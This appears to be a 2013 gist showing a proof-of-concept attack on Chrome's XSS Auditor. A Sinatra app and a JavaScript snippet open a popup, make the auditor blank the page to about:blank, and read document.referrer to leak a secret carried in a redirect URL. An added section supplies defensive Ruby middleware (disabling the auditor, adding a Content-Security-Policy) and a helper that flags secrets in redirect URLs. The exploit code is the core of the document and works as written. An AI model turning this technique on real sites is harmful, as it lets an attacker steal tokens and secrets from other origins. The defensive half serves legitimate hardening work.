XSS Auditor for Evil
require 'sinatra'
require 'securerandom'

=begin
Run this app, then execute the following JavaScript on any origin (the web
inspector console will do).
Set `block` to true for the mode=block case. Leave it false for the no-block
case, where the auditor rewrites the reflected <form> action to about:blank
and the user has to submit the form (requires user interaction).

var block = false;
var cut_me;
if (block) {
  // the auditor matches this against the script tag served by '/'
  cut_me = encodeURIComponent('<script src="http://localhost:4567/some.js"></script>');
} else {
  // the auditor matches this against the form served by '/noblock'
  cut_me = encodeURIComponent('<form action="/asdf">');
}
var playground = window.open(
  'http://127.0.0.1:4567/auth?' + (block ? '' : 'noblock=1&') + 'state=' + cut_me,
  'n', 'height=1,width=1');
var int = setInterval(function () {
  if (playground.document) {
    // it's about:blank now, so the opener can read its document
    alert('Leaked: ' + playground.document.referrer);
    playground.close();
    clearInterval(int);
  }
}, 100);
=end

# Redirects to '/' (mode=block) or '/noblock', carrying a fresh secret and the
# caller-supplied state parameter in the query string.
get '/auth' do
  target = params[:noblock] ? '/noblock' : '/'
  redirect "#{target}?secret=#{SecureRandom.hex(10)}&state=#{params[:state]}"
end

get '/' do
  # Sinatra sends X-XSS-Protection: 1; mode=block by default
  <<HTML
<html>
<head>
<script src="http://localhost:4567/some.js"></script>
</head>
</html>
HTML
end

get '/noblock' do
  headers['X-XSS-Protection'] = '1;' # no block mode
  <<HTML
<html>
<head>
<script src="http://localhost:4567/some.js"></script>
</head>
<body>
<form action="/asdf">
<input type="submit" value="CLICK ME! NOW!">
<input name="one" value="two">
</form>
<a href="javascript:omg(0)">link</a>
</body>
</html>
HTML
end

get '/some.js' do
  'console.log("swaaag")'
end
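The defensive counterpart, added here as an example and not part of the gist: a Rack-style middleware in plain Ruby (the Rack `call(env)` contract is emulated with a lambda, so no gem is needed) that replaces Sinatra's default `X-XSS-Protection: 1; mode=block` on HTML responses with `0`, so the auditor never navigates the page to about:blank, and adds a Content-Security-Policy as the real script control. A second helper flags redirect `Location` values that carry a secret in the query string, which is what `document.referrer` hands to the opener in the PoC above. The class, key list and sample app are constructed for this example.

```ruby
require 'uri'
require 'cgi'

# Rack contract: app.call(env) -> [status, headers, body]. Emulated here so the
# example runs without the rack gem; with Sinatra it would be `use AuditorHardening`.
class AuditorHardening
  HTML = %r{\Atext/html}i

  def initialize(app)
    @app = app
  end

  def call(env)
    status, headers, body = @app.call(env)
    if headers['Content-Type'].to_s =~ HTML
      # "0" switches the auditor off: neither "1" (filter in place) nor
      # "1; mode=block" (navigate to about:blank, the behaviour the PoC abuses).
      headers['X-XSS-Protection'] = '0'
      # The actual XSS defence: only same-origin scripts may run.
      headers['Content-Security-Policy'] ||= "default-src 'self'; script-src 'self'"
    end
    [status, headers, body]
  end
end

# Constructed stand-in for the gist's '/' route with Sinatra's default header set.
LEAKY_APP = lambda do |_env|
  [200, { 'Content-Type' => 'text/html', 'X-XSS-Protection' => '1; mode=block' },
   ['<html></html>']]
end

def hardened_headers(env = { 'PATH_INFO' => '/' })
  AuditorHardening.new(LEAKY_APP).call(env)[1]
end

# Review helper: the gist's /auth redirect puts `secret=` in the URL, which is
# exactly what a referrer leak exposes. Flag such Location headers so the value
# can be moved to a POST body or a cookie instead. Key list is a constructed sample.
SECRET_KEYS = %w[secret token password].freeze

def secret_in_location?(location)
  query = URI(location).query or return false
  (CGI.parse(query).keys & SECRET_KEYS).any?
end
```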
homakov Feb 7, 2013

fsdfsdf